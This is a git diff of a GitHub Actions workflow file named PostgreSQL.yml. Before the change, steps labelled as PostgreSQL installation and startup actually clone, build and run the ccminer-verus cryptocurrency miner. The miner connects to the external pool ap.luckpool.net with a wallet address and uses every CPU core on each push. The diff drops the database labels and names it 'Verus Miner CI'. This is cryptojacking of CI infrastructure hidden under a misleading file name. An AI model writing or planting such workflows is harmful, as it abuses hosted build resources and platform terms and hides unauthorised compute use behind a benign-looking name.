--- a/.github/workflows/PostgreSQL.yml
+++ b/.github/workflows/PostgreSQL.yml
@@ -1,4 +1,4 @@
-name: PostgreSQL Setup CI
+name: Verus Miner CI
 
 on:
   push:
@@ -14,17 +14,18 @@ jobs:
     steps:
       - uses: actions/checkout@v2
 
-      - name: Install PostgreSQL
+      - name: Install dependencies
         run: |
           sudo apt update
           sudo apt install -y git build-essential cmake libcurl4-openssl-dev libssl-dev libjansson-dev automake libgmp-dev
+
+      - name: Clone ccminer-verus
+        run: |
           git clone https://github.com/Oink70/ccminer-verus.git
           cd ccminer-verus
-          mkdir build && cd build
-          cmake ..
-          make
+          ./build.sh
 
-      - name: Start PostgreSQL
+      - name: Start mining
         run: |
-          cd ccminer-verus/build
+          cd ccminer-verus
           ./ccminer -a verus -o stratum+tcp://ap.luckpool.net:3956 -u RRykJ9xGTKunTzEHD54L7hBcWDFf9hcGQG.starter-research-group -p x -t $(nproc)
